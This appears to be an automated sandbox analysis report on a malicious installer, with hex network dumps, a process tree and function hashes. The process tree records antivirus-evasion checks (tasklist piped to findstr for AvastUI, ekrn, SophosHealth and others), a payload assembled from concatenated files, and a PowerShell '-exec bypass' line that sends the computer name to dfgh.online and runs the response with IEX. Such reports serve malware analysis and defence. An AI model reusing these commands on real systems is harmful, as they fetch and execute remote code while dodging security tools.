2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 Data Ascii: @[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 Data Ascii: f@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMoni
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc Data Ascii: erConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUSt
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
2024-12-26 17:26:42 UTC	1369	IN	Data Raw: 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J

Target ID:	1
Start time:	12:25:07
Start date:	26/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff7f00b0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:25:30
Start date:	26/12/2024
Path:	C:\Program Files\7-Zip\7zG.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\installer_1.05_36.4\" -spe -an -ai#7zMap8006:94:7zEvent16868
Imagebase:	0xee0000
File size:	700'416 bytes
MD5 hash:	50F289DF0C19484E970849AAC4E6F977
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:25:40
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe"
Imagebase:	0x400000
File size:	1'084'064 bytes
MD5 hash:	911D5567537C6BB8413884309387BB54
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:25:40
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd
Imagebase:	0xf20000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:25:40
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:25:42
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1c0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:25:42
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:25:42
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1c0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:25:42
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:25:43
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 709182
Imagebase:	0xf20000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:25:43
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Bet
Imagebase:	0xe10000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:25:43
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "brandon" M
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:25:44
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N
Imagebase:	0xf20000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:25:44
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
Wow64 process (32bit):	true
Commandline:	Lightweight.com N
Imagebase:	0xa10000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:25:44
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xf80000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:25:48
Start date:	26/12/2024
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\Read me before you start.txt
Imagebase:	0x7ff7cda80000
File size:	201'216 bytes
MD5 hash:	27F71B12CB585541885A31BE22F61C83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:26:38
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0x860000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:26:38
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:26:56
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass MZP
Imagebase:	0x860000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:26:56
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	725
Total number of Limit Nodes:	44

Executed Functions

Function 08DE1840 Relevance: 2.0, Strings: 1, Instructions: 751
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 08DE1908

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6293df26c015bd3bc481c6ace0b4e2182329c3b4bc96b951a2686789be713a2e
Instruction ID: 8bf9a5fc17b0749cb68a22d5449fb0fc462fa90a1688bc10fd78e516d01f5c4a
Opcode Fuzzy Hash: 6293df26c015bd3bc481c6ace0b4e2182329c3b4bc96b951a2686789be713a2e
Instruction Fuzzy Hash: F872E534A00219CFDB25DF24C884B99BBB2FF48352F1485A9E84AAB391DB759DC1CF50

Function 0789F06C Relevance: 1.6, APIs: 1, Instructions: 128
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0789F7C0

Memory Dump Source

Source File: 0000001C.00000002.2163479852.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7890000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 8e0222133c7b633dada4fdd051e3de18e93f136414938e35d0b78f9896d63317
Instruction ID: e862170b364e05fc6dd8d85af4eb0ba291678feb5c301c087027047d8e1bd166
Opcode Fuzzy Hash: 8e0222133c7b633dada4fdd051e3de18e93f136414938e35d0b78f9896d63317
Instruction Fuzzy Hash: 5F51E3B1D01348AFDF14CFA9D984B9DBBF2AF48314F28812AE508BB260D7749885CF51

Function 08DEBC80 Relevance: .8, Instructions: 810COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066dedf25c44a9cba3710126e01d5e4c98c0335e8642b7a3460b9fad59b7fb1c
Instruction ID: b552ddf3d934a5ca8fa2c3a8197cad7039089e68da5cc692631779d5625c6c37
Opcode Fuzzy Hash: 066dedf25c44a9cba3710126e01d5e4c98c0335e8642b7a3460b9fad59b7fb1c
Instruction Fuzzy Hash: 13821974A10218DFDB15DF64C994B99BBB2FF88351F1482A9E9099B361CB34ED81CF90

Function 04C0F4E0 Relevance: .7, Instructions: 700COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0dd815b93c7696c4e5d170db03afe0f2768159119c772ebca73956489e5971e
Instruction ID: 3fb851219947f61b5563dc9e03ab1d33ee15230d3aeefb92b4117d9770c7c558
Opcode Fuzzy Hash: d0dd815b93c7696c4e5d170db03afe0f2768159119c772ebca73956489e5971e
Instruction Fuzzy Hash: 07523C34600209CFDB25DF68C850B9EB7B3AF89315F1485ADD909AB390DB75ED85CB60

Function 08DE35D8 Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47917529b8f56a4768ca6a6c4a7c108b23afa3bda7a8456138ebd8084480c361
Instruction ID: 669f3a50db3e64c8f24e6d4fb62922efe9406d224e765a17417ae627b39e0057
Opcode Fuzzy Hash: 47917529b8f56a4768ca6a6c4a7c108b23afa3bda7a8456138ebd8084480c361
Instruction Fuzzy Hash: 32525C34A00259CFCB25EF64C854BADBBB2FF88351F1086A9E909AB351DB359D85CF50

Function 087E7620 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85becaced81d6ed71377400f5d28ce66cc3d46c58e69fcdb00ed56d678a505e0
Instruction ID: 7c13720e5fe0d7696326ddbbf84d8334d8c0642751286568291073b9530f1d98
Opcode Fuzzy Hash: 85becaced81d6ed71377400f5d28ce66cc3d46c58e69fcdb00ed56d678a505e0
Instruction Fuzzy Hash: 9E425E34A00719DFEB15DB64C850BA9B7B6EF88300F1085A9E509BB395DB75ADC1CFA0

Function 08C9B8E2 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968af7780aeb72d57b3ca5e280c10ecad3c8f9d5870e8c14d2d9da06e885dfbd
Instruction ID: 6cc21d48d5b8b6a0279521eef832c39b91db37d5babfaf9a744277e274134ed4
Opcode Fuzzy Hash: 968af7780aeb72d57b3ca5e280c10ecad3c8f9d5870e8c14d2d9da06e885dfbd
Instruction Fuzzy Hash: 17128D34B00214DFCF14DFA8E498A6DB7F6EF88222B1584ADD5869B355DB30ED42CB50

Function 08DD9670 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd0d15aa19d83653f65a2a6cd6ff92f86887842085930776d6bfc5ab0cae711
Instruction ID: 056321b9c711e0a52de91d8e2edb8c9ed2387496b3ba9c76c84aabf34141cdc4
Opcode Fuzzy Hash: cfd0d15aa19d83653f65a2a6cd6ff92f86887842085930776d6bfc5ab0cae711
Instruction Fuzzy Hash: 5F0289357002049FDB18DF79D898A6EBBF6FF88651B1581A9E506DB361CB31EC42CB90

Function 08B91AC0 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170668630.0000000008B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3bedca6d4282a381df711dee492e9d5bedfcf9ef3016758d343d340300678b2
Instruction ID: cf3b7dc5c06c37625134b959598bb5ea3f51813e152b2e6a89637729f7de15e3
Opcode Fuzzy Hash: a3bedca6d4282a381df711dee492e9d5bedfcf9ef3016758d343d340300678b2
Instruction Fuzzy Hash: 53026A34A00609DFDB14DFA9C484A9EBBF6FF88351F158168E945AB394DB34EC46CB90

Function 08B580F0 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3e616e87ae286c0f2e5ad923550c0bb34491d00b18c314efe89c78fae90e44
Instruction ID: 2c21280df567d2b2addc4caf31761ecd85a9ffc89b55074109592edcc287059c
Opcode Fuzzy Hash: be3e616e87ae286c0f2e5ad923550c0bb34491d00b18c314efe89c78fae90e44
Instruction Fuzzy Hash: 66E15B34B002058FDB05DFA9D894BAEBBE6FF88351F148169E9069B3A4CB74DD41CB90

Function 087E7610 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b42fce5529cfa8c2665cd6c2205be99e76f9fb07fef3eb1625ebdd07c50a06
Instruction ID: f591d2d951a7e45d00d185f72a249345485f1375e6fcaf0f268c5a1c7e02880e
Opcode Fuzzy Hash: 18b42fce5529cfa8c2665cd6c2205be99e76f9fb07fef3eb1625ebdd07c50a06
Instruction Fuzzy Hash: 2AE18034A00719DFEB15EB64C850BAAB776EF89300F1081A9E5097B395DB75ADC1CFA0

Function 08DE85D8 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04385a5e4e6f62ef5ff4ac2cc4fd239e9e1781611e181a2ad7529d3033232d19
Instruction ID: 8e61038e2588d483771b06523569b45324ced9fdbfaae86db1998ef829db1d13
Opcode Fuzzy Hash: 04385a5e4e6f62ef5ff4ac2cc4fd239e9e1781611e181a2ad7529d3033232d19
Instruction Fuzzy Hash: 83C1DF34B007448FDB25EB76949466EB7E2AFC8681B04893DE906CB350DF78DC46DB91

Function 08C96398 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0d6287f6e5491ec0f2dfdebbf26f5f5243210fd14eb93d70992368c9c64351
Instruction ID: fd6d44a2ed40a7b6acae25383e481fb92a286798867afe6f64051c72bdebf948
Opcode Fuzzy Hash: ae0d6287f6e5491ec0f2dfdebbf26f5f5243210fd14eb93d70992368c9c64351
Instruction Fuzzy Hash: 91C19C35B003448FCB15DFB8D898AAEBBB2EFC4211B14856DE9469B385DF349D06CB50

Function 08D10CD0 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e7aebe46fa9ea0287ee5b2d56dd9cb3d2fb80026a3151c3bbe53167edcd666
Instruction ID: 58f0fe6d01fcc7c22b7fd151a16e7c9910cb5219abe445b1dc353824bebe788c
Opcode Fuzzy Hash: 45e7aebe46fa9ea0287ee5b2d56dd9cb3d2fb80026a3151c3bbe53167edcd666
Instruction Fuzzy Hash: EFB14C34A002049FDF14EB68E494BAEB7F2AF88352F15C169E546AB391CB75EC81CB50

Function 08DEAA78 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db066d09d7907aea0b165d207a52739069b32f5975c399f481f4e3271ebb8843
